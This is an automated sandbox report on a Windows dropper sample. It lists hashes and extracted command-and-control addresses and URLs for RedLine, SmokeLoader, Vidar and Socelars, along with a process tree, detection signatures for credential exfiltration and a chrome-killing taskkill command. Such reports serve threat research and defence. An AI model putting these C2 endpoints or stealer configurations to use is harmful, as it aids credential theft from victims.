Analysis
-
max time kernel
81s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
22/11/2021, 12:51
Static task
static1
Behavioral task
behavioral1
Sample
d9552a15a61f255df3206b63ee0383be.exe
Resource
win7-en-20211104
General
-
Target
d9552a15a61f255df3206b63ee0383be.exe
-
Size
554KB
-
MD5
d9552a15a61f255df3206b63ee0383be
-
SHA1
7c76e2edcf184b90d40003dac71b08e3a3ed2e8c
-
SHA256
0cdd906491990c6ba9c24bdd60172057587859a8e649ba7f4b51fece9a0fdac6
-
SHA512
0ce1db824d226df28177b6e5394fa1f8483333583d8332680d4cf0cfc8627a53d69c1c857b319dd200e0f38bf88d445a4289d78472fe3167cc39ae6a85f21599
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
redline
185.92.73.160:46771
Extracted
redline
13
136.144.41.178:9295
Extracted
redline
TestBest1
188.227.87.7:10234
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
metasploit
windows/single_exec
Extracted
vidar
48.6
937
https://mastodon.online/@valhalla
https://koyu.space/@valhalla
-
profile_id
937
Extracted
redline
udptest
193.56.146.64:65441
Extracted
redline
Ruzki 3k
185.244.181.71:2119
Extracted
redline
ignation
37.9.13.169:63912
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6796 5044 rundll32.exe 124 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6392 5044 rundll32.exe 124 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 12 IoCs
resource yara_rule behavioral2/memory/1736-192-0x00000000021E0000-0x000000000220E000-memory.dmp family_redline behavioral2/memory/2592-200-0x0000000002220000-0x000000000224D000-memory.dmp family_redline behavioral2/memory/1392-221-0x0000000002330000-0x000000000235E000-memory.dmp family_redline behavioral2/memory/2324-224-0x0000000002400000-0x000000000242E000-memory.dmp family_redline behavioral2/memory/2324-231-0x0000000002430000-0x000000000245C000-memory.dmp family_redline behavioral2/memory/1392-229-0x00000000024A0000-0x00000000024CC000-memory.dmp family_redline behavioral2/memory/2592-213-0x00000000023D0000-0x00000000023FC000-memory.dmp family_redline behavioral2/memory/724-214-0x0000000002490000-0x00000000024BC000-memory.dmp family_redline behavioral2/memory/1736-207-0x00000000024D0000-0x00000000024FC000-memory.dmp family_redline behavioral2/memory/724-199-0x0000000002220000-0x000000000224E000-memory.dmp family_redline behavioral2/memory/3796-311-0x0000000000E80000-0x0000000000E9B000-memory.dmp family_redline behavioral2/memory/4180-367-0x0000000000418EFE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001abcb-150.dat family_socelars behavioral2/files/0x000400000001abcb-149.dat family_socelars -
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/2052-300-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar behavioral2/memory/2052-299-0x0000000002170000-0x0000000002245000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
pid Process 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 1440 OGpflBgSHNuzxrPxFfnnscqW.exe 1736 VH7kbYzRqJXJ_EUcJHqV5bPa.exe 680 XNZwpkTvIAOD78FTHWKpQF_u.exe 2880 MA4HOG6zBLtW4CknflfVfoVb.exe 2592 IIEJIZY_SZgssVHr8AKAwUN9.exe 1320 Ys9xONIZ2zMkfdltG8YIwyLI.exe 1296 O6FR10TQUM5bpSSUN_mhgVfA.exe 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe 724 _VjiwHbtuy37_JPzF6IcOdvI.exe 3300 obEL72OIYFiysJSfwnbvSnkT.exe 1280 WVrSv9ymnNaFCHZ1OhI4PXZh.exe 3704 kDj8E7Fct6tGctK6mmenGu9x.exe 2340 mnFuOqYf8WL71_aC7nZIaRZs.exe 2052 NDd0Pa2E0Rb0cZgDOhr9UELU.exe 1740 mXxK5JogboFNja5c52jC2vWc.exe 1912 6uHEVhTPtit6lTxg8fV0eD2N.exe 2888 SxsxiDh19G4M6ZMjAAn63qOK.exe 3796 gVf6IXUmOOirYKM8eOhB0zv0.exe 2324 9WIJtxlsgOIp2HQf2t6RZdoY.exe 1392 YlM8f8ZYF7ZBWfH06sVqXVME.exe 3108 inst2.exe 3388 jg1_1faf.exe 3508 rtst1039.exe 700 kDj8E7Fct6tGctK6mmenGu9x.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation d9552a15a61f255df3206b63ee0383be.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000400000001ac15-336.dat themida behavioral2/files/0x000400000001ac15-335.dat themida behavioral2/files/0x000400000001ac1c-352.dat themida behavioral2/files/0x000400000001ac1c-351.dat themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 110 ip-api.com 163 ipinfo.io 328 ip-api.com 21 ipinfo.io 22 ipinfo.io 103 ipinfo.io 105 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3704 set thread context of 700 3704 kDj8E7Fct6tGctK6mmenGu9x.exe 95 -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\rtst1039.exe mnFuOqYf8WL71_aC7nZIaRZs.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe mnFuOqYf8WL71_aC7nZIaRZs.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini mnFuOqYf8WL71_aC7nZIaRZs.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst2.exe mnFuOqYf8WL71_aC7nZIaRZs.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe mnFuOqYf8WL71_aC7nZIaRZs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
pid pid_target Process procid_target 708 680 WerFault.exe 70 656 1320 WerFault.exe 73 4612 1740 WerFault.exe 83 4936 1740 WerFault.exe 83 5100 1740 WerFault.exe 83 4172 1740 WerFault.exe 83 3612 1740 WerFault.exe 83 2772 4488 WerFault.exe 142 5340 4488 WerFault.exe 142 2452 4488 WerFault.exe 142 6124 4488 WerFault.exe 142 5420 4488 WerFault.exe 142 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WVrSv9ymnNaFCHZ1OhI4PXZh.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WVrSv9ymnNaFCHZ1OhI4PXZh.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WVrSv9ymnNaFCHZ1OhI4PXZh.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4024 schtasks.exe 1728 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3064 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 5208 taskkill.exe 5060 taskkill.exe 4060 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2468 d9552a15a61f255df3206b63ee0383be.exe 2468 d9552a15a61f255df3206b63ee0383be.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe 956 gHpwhoCGxUWsmql8C5nAlwbs.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeCreateTokenPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeAssignPrimaryTokenPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeLockMemoryPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeIncreaseQuotaPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeMachineAccountPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeTcbPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeSecurityPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeTakeOwnershipPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeLoadDriverPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeSystemProfilePrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeSystemtimePrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeProfSingleProcessPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeIncBasePriorityPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeCreatePagefilePrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeCreatePermanentPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeBackupPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeRestorePrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeShutdownPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeDebugPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeAuditPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeSystemEnvironmentPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeChangeNotifyPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeRemoteShutdownPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeUndockPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeSyncAgentPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeEnableDelegationPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeManageVolumePrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeImpersonatePrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeCreateGlobalPrivilege 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: 31 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: 32 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: 33 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: 34 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: 35 3764 NJLZolJE37X_FqtXQ3EqKJkr.exe Token: SeRestorePrivilege 656 WerFault.exe Token: SeBackupPrivilege 656 WerFault.exe Token: SeDebugPrivilege 3796 gVf6IXUmOOirYKM8eOhB0zv0.exe Token: SeDebugPrivilege 708 WerFault.exe Token: SeDebugPrivilege 1736 VH7kbYzRqJXJ_EUcJHqV5bPa.exe Token: SeDebugPrivilege 2888 SxsxiDh19G4M6ZMjAAn63qOK.exe Token: SeDebugPrivilege 656 WerFault.exe Token: SeDebugPrivilege 724 _VjiwHbtuy37_JPzF6IcOdvI.exe Token: SeDebugPrivilege 2592 IIEJIZY_SZgssVHr8AKAwUN9.exe Token: SeDebugPrivilege 1392 YlM8f8ZYF7ZBWfH06sVqXVME.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 956 2468 d9552a15a61f255df3206b63ee0383be.exe 69 PID 2468 wrote to memory of 956 2468 d9552a15a61f255df3206b63ee0383be.exe 69 PID 2468 wrote to memory of 1440 2468 d9552a15a61f255df3206b63ee0383be.exe 77 PID 2468 wrote to memory of 1440 2468 d9552a15a61f255df3206b63ee0383be.exe 77 PID 2468 wrote to memory of 1440 2468 d9552a15a61f255df3206b63ee0383be.exe 77 PID 2468 wrote to memory of 2880 2468 d9552a15a61f255df3206b63ee0383be.exe 76 PID 2468 wrote to memory of 2880 2468 d9552a15a61f255df3206b63ee0383be.exe 76 PID 2468 wrote to memory of 2880 2468 d9552a15a61f255df3206b63ee0383be.exe 76 PID 2468 wrote to memory of 680 2468 d9552a15a61f255df3206b63ee0383be.exe 70 PID 2468 wrote to memory of 680 2468 d9552a15a61f255df3206b63ee0383be.exe 70 PID 2468 wrote to memory of 680 2468 d9552a15a61f255df3206b63ee0383be.exe 70 PID 2468 wrote to memory of 2592 2468 d9552a15a61f255df3206b63ee0383be.exe 74 PID 2468 wrote to memory of 2592 2468 d9552a15a61f255df3206b63ee0383be.exe 74 PID 2468 wrote to memory of 2592 2468 d9552a15a61f255df3206b63ee0383be.exe 74 PID 2468 wrote to memory of 1736 2468 d9552a15a61f255df3206b63ee0383be.exe 75 PID 2468 wrote to memory of 1736 2468 d9552a15a61f255df3206b63ee0383be.exe 75 PID 2468 wrote to memory of 1736 2468 d9552a15a61f255df3206b63ee0383be.exe 75 PID 2468 wrote to memory of 1320 2468 d9552a15a61f255df3206b63ee0383be.exe 73 PID 2468 wrote to memory of 1320 2468 d9552a15a61f255df3206b63ee0383be.exe 73 PID 2468 wrote to memory of 1320 2468 d9552a15a61f255df3206b63ee0383be.exe 73 PID 2468 wrote to memory of 724 2468 d9552a15a61f255df3206b63ee0383be.exe 72 PID 2468 wrote to memory of 724 2468 d9552a15a61f255df3206b63ee0383be.exe 72 PID 2468 wrote to memory of 724 2468 d9552a15a61f255df3206b63ee0383be.exe 72 PID 2468 wrote to memory of 1296 2468 d9552a15a61f255df3206b63ee0383be.exe 81 PID 2468 wrote to memory of 1296 2468 d9552a15a61f255df3206b63ee0383be.exe 81 PID 2468 wrote to memory of 1296 2468 d9552a15a61f255df3206b63ee0383be.exe 81 PID 2468 wrote to memory of 3764 2468 d9552a15a61f255df3206b63ee0383be.exe 78 PID 2468 wrote to memory of 3764 2468 d9552a15a61f255df3206b63ee0383be.exe 78 PID 2468 wrote to memory of 3764 2468 d9552a15a61f255df3206b63ee0383be.exe 78 PID 2468 wrote to memory of 3704 2468 d9552a15a61f255df3206b63ee0383be.exe 79 PID 2468 wrote to memory of 3704 2468 d9552a15a61f255df3206b63ee0383be.exe 79 PID 2468 wrote to memory of 3704 2468 d9552a15a61f255df3206b63ee0383be.exe 79 PID 2468 wrote to memory of 3300 2468 d9552a15a61f255df3206b63ee0383be.exe 80 PID 2468 wrote to memory of 3300 2468 d9552a15a61f255df3206b63ee0383be.exe 80 PID 2468 wrote to memory of 1280 2468 d9552a15a61f255df3206b63ee0383be.exe 82 PID 2468 wrote to memory of 1280 2468 d9552a15a61f255df3206b63ee0383be.exe 82 PID 2468 wrote to memory of 1280 2468 d9552a15a61f255df3206b63ee0383be.exe 82 PID 2468 wrote to memory of 2340 2468 d9552a15a61f255df3206b63ee0383be.exe 85 PID 2468 wrote to memory of 2340 2468 d9552a15a61f255df3206b63ee0383be.exe 85 PID 2468 wrote to memory of 2340 2468 d9552a15a61f255df3206b63ee0383be.exe 85 PID 2468 wrote to memory of 2052 2468 d9552a15a61f255df3206b63ee0383be.exe 84 PID 2468 wrote to memory of 2052 2468 d9552a15a61f255df3206b63ee0383be.exe 84 PID 2468 wrote to memory of 2052 2468 d9552a15a61f255df3206b63ee0383be.exe 84 PID 2468 wrote to memory of 1740 2468 d9552a15a61f255df3206b63ee0383be.exe 83 PID 2468 wrote to memory of 1740 2468 d9552a15a61f255df3206b63ee0383be.exe 83 PID 2468 wrote to memory of 1740 2468 d9552a15a61f255df3206b63ee0383be.exe 83 PID 2468 wrote to memory of 1912 2468 d9552a15a61f255df3206b63ee0383be.exe 87 PID 2468 wrote to memory of 1912 2468 d9552a15a61f255df3206b63ee0383be.exe 87 PID 2468 wrote to memory of 1912 2468 d9552a15a61f255df3206b63ee0383be.exe 87 PID 2468 wrote to memory of 2888 2468 d9552a15a61f255df3206b63ee0383be.exe 86 PID 2468 wrote to memory of 2888 2468 d9552a15a61f255df3206b63ee0383be.exe 86 PID 2468 wrote to memory of 2888 2468 d9552a15a61f255df3206b63ee0383be.exe 86 PID 2468 wrote to memory of 3796 2468 d9552a15a61f255df3206b63ee0383be.exe 91 PID 2468 wrote to memory of 3796 2468 d9552a15a61f255df3206b63ee0383be.exe 91 PID 2468 wrote to memory of 3796 2468 d9552a15a61f255df3206b63ee0383be.exe 91 PID 2468 wrote to memory of 2324 2468 d9552a15a61f255df3206b63ee0383be.exe 89 PID 2468 wrote to memory of 2324 2468 d9552a15a61f255df3206b63ee0383be.exe 89 PID 2468 wrote to memory of 2324 2468 d9552a15a61f255df3206b63ee0383be.exe 89 PID 2468 wrote to memory of 1392 2468 d9552a15a61f255df3206b63ee0383be.exe 90 PID 2468 wrote to memory of 1392 2468 d9552a15a61f255df3206b63ee0383be.exe 90 PID 2468 wrote to memory of 1392 2468 d9552a15a61f255df3206b63ee0383be.exe 90 PID 2340 wrote to memory of 3108 2340 mnFuOqYf8WL71_aC7nZIaRZs.exe 103 PID 2340 wrote to memory of 3108 2340 mnFuOqYf8WL71_aC7nZIaRZs.exe 103 PID 2340 wrote to memory of 3108 2340 mnFuOqYf8WL71_aC7nZIaRZs.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe"C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe"C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:956
-
-
C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe"C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe"2⤵
- Executes dropped EXE
PID:680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 4003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:708
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe"C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:724
-
-
C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe"C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe"2⤵
- Executes dropped EXE
PID:1320 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 4003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe"C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe"C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"2⤵
- Executes dropped EXE
PID:2880 -
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:1728
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:2272
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:3444
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:4180
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"2⤵
- Executes dropped EXE
PID:1440 -
C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"3⤵PID:3736
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe"C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:4488
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5060
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3704 -
C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"3⤵
- Executes dropped EXE
PID:700
-
-
-
C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe"C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe"2⤵
- Executes dropped EXE
PID:3300
-
-
C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe"C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe"2⤵
- Executes dropped EXE
PID:1296 -
C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe"C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe"3⤵PID:1080
-
C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe"C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe"4⤵PID:4896
-
-
C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe"C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe"4⤵PID:4488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6525⤵
- Program crash
PID:2772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6645⤵
- Program crash
PID:5340
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 7685⤵
- Program crash
PID:2452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 8045⤵
- Program crash
PID:6124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 8005⤵
- Program crash
PID:5420
-
-
-
C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe"C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe"4⤵PID:3600
-
-
C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"4⤵PID:3164
-
C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe" -u5⤵PID:5520
-
-
-
